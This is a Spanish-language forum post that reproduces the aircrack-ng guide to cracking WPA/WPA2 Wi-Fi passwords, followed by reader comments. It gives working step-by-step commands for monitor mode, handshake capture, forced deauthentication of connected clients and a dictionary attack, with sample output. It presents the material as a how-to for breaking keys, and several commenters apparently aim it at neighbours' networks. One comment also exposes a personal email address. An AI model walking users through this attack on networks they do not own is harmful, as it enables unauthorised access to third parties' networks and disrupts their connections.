tutorial crackear claves wpa y wpa2 wifi

El objetivo es capturar el handshake WPA/WPA2 y usarlo con aircrack-ng para obtener la clave pre-compartida.

Esto se puede hacer de forma activa o pasiva. “Activa” significa que podemos acelerar el proceso deautenticando a un cliente wireless. “Pasiva” significa que podemos esperar a que un cliente wireless se autentifique en la red WPA/WPA2. La ventaja de la forma pasiva es que no necesitamos inyectar y por lo tanto podremos utilizarla desde Windows.

Aquí estań los pasos que vamos a seguir:

1.Colocar la interface wireless en modo monitor y especificar el canal del AP
2.Iniciar airodump-ng en el canal del AP con filtro de bssid para capturar el handshake
3.Usar aireplay-ng para deautentificar a un cliente conectado
4.Ejecutar aircrack-ng para obtener la clave pre-compartida usando ese handshake

Paso 1 - Colocar la interface wireless en modo monitor y especificar el canal del AP

El propósito de este paso es colocar la tarjeta en el modo denominado modo monitor. En este modo la tarjeta wireless puede escuchar y capturar cualquier paquete en el aire. En cambio, en el modo normal la tarjeta solo “escuchará” los paquetes que van destinados a la misma. Escuchando todos los paquetes, podremos más adelante capturar los 4 paquetes que forman el handshake WPA/WPA2. Y opcionalmente tambien podremos deautenticar a un cliente wireless

Primero para la interface ath0 escribiendo

airmon-ng stop ath0

El sistema nos responderá

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)[/
align]


Escribe “iwconfig” para comprobar que no hay mas interfaces athX. Deberás ver algo como esto:

lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions


Si queda alguna interface athX, para cada una de ellas. Cuando termines, ejecuta “iwconfig” para verificar que ya no queda ninguna.

Ahora, escribe el siguiente comando para poner la tarjeta wireless en modo monitor en el canal 9:

Si queda alguna interface athX, para cada una de ellas. Cuando termines, ejecuta “iwconfig” para verificar que ya no queda ninguna.

Ahora, escribe el siguiente comando para poner la tarjeta wireless en modo monitor en el canal 9:

airmon-ng wifi0 9

Nota: En este comando usamos “wifi0” en lugar de nuestra interface “ath0”. Esto se debe a que estamos usando los drivers madwifi-ng y no madwifi-old.

El sistema nos responderá:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)



Puedes observar que “ath0” aparece colocada en modo monitor.

Para confirmar que la interface está bien configurada, escribimos “iwconfig”.

El sistema nos responderá:

lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0


Podemos ver que ath0 está en modo monitor, en la frecuencia 2.452GHz que corresponde al canal 9 y en “Access Point” vemos la dirección MAC de nuestra tarjeta wireless. Es importante comprobar toda esta información antes de continuar, ya que sino no funcionará.

Para ver la correspondencia entre frecuencia y canal, mira: http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels y selecciona “Wifi Channel Selection and Channel Overlap” Así obtendrás la frecuencia para cada canal.

Paso 2 - Iniciar airodump-ng para capturar el handshake

El propósito de este paso es ejecutar airodump-ng para capturar los 4 paquetes del handshake en el momento que un cliente se autentifica con el AP en el que estamos interesados

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

Donde:

■-c 9 es el canal de la red wireless
■- -bssid 00:14:6C:7E:40:80 es la dirección MAC del AP. Esto elimina el tráfico de otras redes.
■-w psk es el nombre del archivo en el que guardaremos los IVs.
■ath0 es el nombre de nuestra interface.
Importante: NO uses la opción ”- -ivs”. Debes capturar los paquetes enteros.

A continuación puedes ver una imagen en la que se vé un cliente wireless conectado a la red:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5DB:C2 35 0 116


Y ahora una imagen de la red sin clientes conectados:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes


Paso 3 - Usar aireplay-ng para deautentificar a un cliente conectado

Este paso es opcional. Solo es necesario realizar este paso si optas por acelerar activamente todo el proceso. El requisito necesario es que se encuentre asociado actualmente con el AP algún cliente wireless. Si no hay ningún cliente wireless asociado al AP, lee el siguiente paso del manual y ten paciencia. No es necesario decir, que si más tarde aparece algún cliente wireless, puedes volver atrás y seguir este apartado del manual.

Lo que se hace en este paso es enviar un mensaje al cliente wireless para desasociarlo con el AP. Entonces el cliente wireless se reautenticará con el AP. En la reautenticacion se generarán los 4 paquetes de autenticacion (handshake) en los que estamos interesados en capturar. Despues los usaremos para intentar obtener la clave precompartida WPA/WPA2.

Prestando atención a la salida del comando airodump-ng del paso anterior, podemos determinar el cliente que se encuentra conectado actualmente. Necesitamos su dirección MAC para el siguiente comando. Abre otra consola y escribe

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5DB:C2 ath0

Donde:

■-0 significa deautenticación
■1 es el número de deautenticaciones enviadas (puedes enviar infinitas si lo deseas)
■-a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso
■-c 00:0F:B5DB:C2 es la dirección MAC del cliente que queremos deautenticar
■ath0 es el nombre de nuestra interface
A continuación puedes ver la salida del comando

11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]

Paso 4 - Ejecutar aircrack-ng para obtener la clave pre-compartida

El propósito de este paso es conseguir la clave WPA/WPA2 precompartida. Para hacer esto, se necesita un diccionario de posibles palabras. Básicamente, aircrack-ng comprueba cada una de esas palabras para mirar si coincide con la clave.

Hay un pequeño diccionario que se incluye en la suite aircrack-ng - “password.lst”. En el Wiki FAQ puedes encontrar una larga lista de diferentes diccionarios. Se puede usar John the Ripper (JTR) para construir un diccionario propio y despues usarlo con aircrack-ng.

Abre otra consola y escribe:

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

Donde:

■-w password.lst es el nombre del archivo del diccionario. Recuerda que tienes que especificar la ruta completa del archivo si no se encuentra en el mismo directorio.
■*.cap es el nombre del grupo de archivos que contienen los paquetes capturados. Date cuenta que en este caso usamos el comodín * para incluir varios archivos

Esta es la salida cuando se encuentra algún handshake

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.

# BSSID ESSID Encryption

1 00:14:6C:7E:40:80 teddy WPA (1 handshake)

Choosing first network as target


En este punto, aircrack-ng intentará encontrar la clave. Dependiendo de la velocidad de la CPU y del tamaño del diccionario, este proceso puede llevar bastante tiempo, incluso días.

A continuación puedes ver que ocurre cuando averigua la clave precompartida

Aircrack-ng 0.8


[00:00:00] 2 keys tested (37.20 k/s)


KEY FOUND! [ 12345678 ]


Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB


fuente: http://www.aircrack-ng.org/doku.php?id=es:cracking_wpa

18 comentarios - tutorial crackear claves wpa y wpa2 wifi

eldeivi_87
no entendi nada, pero a la vez entendi la idea, le voy a decir a un amigo a ver si lo podemos hacer andar. gracias por el aporte. saludos. DAVID
DJcontroll
hola buen post eh estado haciendo pruebas con algunos programas para como wfiway 1.0 wifislax 3.... bactrakc 3 tropixx y eso pero no logro el vendito hanshake para wpa para wep lo ago ya hace mucho pero el wpa no logro hacerlo aver si me puedes ayudar estoy probando con mi router que lo pude en wpa psk pero bueno aver si me pudes ayudar saludos mi msn es lapegasso2000@hotmail.com
chinassky
Si anda esto regreso a darte +10
pablokpo87
no podes poner esa contraseña tan pedorra.... ponele mi nick como contraseña y no la rompes con el diccionario...
JUANSKY00024
hola, yo tengo una duda, yo tengo el backtrack 3 y 4 y bueno me baje un diccionario de otro post de aqui mismo pero no se como poner la ruta por que lo tengo en otra pen drive, por que el bt lo corro con una pen-drive, me puedes decir como porner le ruta, haaaa y otra pregunta es: si no tengo diccionario no puedo campturar un handshake ??? por que lo he intentado pero no logro hacerlo, saludos
nakgyverzx
JUANSKY00024 dijo:hola, yo tengo una duda, yo tengo el backtrack 3 y 4 y bueno me baje un diccionario de otro post de aqui mismo pero no se como poner la ruta por que lo tengo en otra pen drive, por que el bt lo corro con una pen-drive, me puedes decir como porner le ruta, haaaa y otra pregunta es: si no tengo diccionarios no puedo campturar un handshake ??? por que lo he intentado pero no logro hacerlo, saludos


Mira, es sencillo, tienes k ir a sistema de archivos > luego a la carpeta MEDIA > Buscas la carpeta con el nombre de tu pendrive > localizas el archivo y para el diccionario seria:

-w /media/"Nombre del pen drive"/"Fichero.txt"

Ejemplo:

aircrack-ng -a 2 -w /media/SANDISK8/diccionario.txt

Espero servirte de ayuda
nakgyverzx
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap


es mejor usar esta otra, para poder seleccionar la red:

aircrack-ng -a 2 captura.cap -w diccionario.txt
galcau
Funciona si o no??????????
guillenet22
Buena data pero sigo sin conseguir el maldito handshake porq mi vecino no se conecta casi nunca!!!!!
xenoborg
lo voy a intentar muchas gracias
agucasta07
Donde coloco airmon-ng stop ath0 y esos comandos::¡¡??
ammcdmr
Aircrack-ng 0.8


[00:00:00] 2 keys tested (37.20 k/s)


KEY FOUND! [ 12345678 ]


Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB esto es lo que me sale de acuedo pero donde pongo 12345678 porque teóricamente tendría que salirme ejemplo ono b3b8 poner esa clave